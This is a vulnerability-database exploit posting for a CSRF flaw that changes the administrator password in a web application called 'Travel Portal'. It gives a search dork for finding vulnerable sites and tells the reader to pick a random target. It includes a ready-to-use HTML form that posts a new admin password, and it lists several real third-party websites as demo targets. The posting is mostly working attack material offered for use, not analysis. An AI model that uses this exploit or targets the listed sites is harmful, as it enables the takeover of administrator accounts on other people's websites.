Travel Portal - Remote Admin Password Chang CSRF

2017.01.17
ir OmidKiller (IR) ir
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A
Dork: inurl:admin/admin.php intext:Travel Portal

+++++++++++++++++++++++++++++++++++++++ # Exploit Title: Travel Portal - Remote Admin Password Chang ( CSRF ) # Author : OmidKiller # Dork : inurl:admin/admin.php intext:Travel Portal # Tested On: Kali Linux / Ubuntu Linux / Firefox # Date: 16/1/2017 +++++++++++++++++++++++++++++++++++++++ # PoC : 1.Search Dork And Open Random Target 2.Edit <form method="post" action="http://target.com/admin/admin.php"> In " Code " And Use For Change Password ;) Ex : <form method="post" action="http://www.sphider.eu/admin/admin.php"> +++++++++++++++++++++++++++++++++++++++ # Code : <body> <title>Exploit By OmidKiller</title> </table> <br> <h3>Travel Portal - Remote Admin Password Change</h3> <table> <tr> <form method="post" action="http://target.com/admin/admin.php"> <input type="hidden" name="admin_id" value="1"> <td align=right>Admin Name:</td><td align=left>admin<td> </tr> <tr> <td align=right>New Password:</td><td align=left><input type="password" name="password" size="40" maxlength="40" ><td> </tr> <tr> <td></td><td><input type="submit" name="submit" value="Update Password"></td> </form> </tr> </table> </body> +++++++++++++++++++++++++++++++++++++++ # Demo [+] http://www.adia.info/stat/admin/admin.php [+] http://www.sphider.eu/admin/admin.php [+] http://ruebennest.de/planetstat/admin/admin.php [+] http://intern.orthopaedics.or.at/kalender/admin/admin.php


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top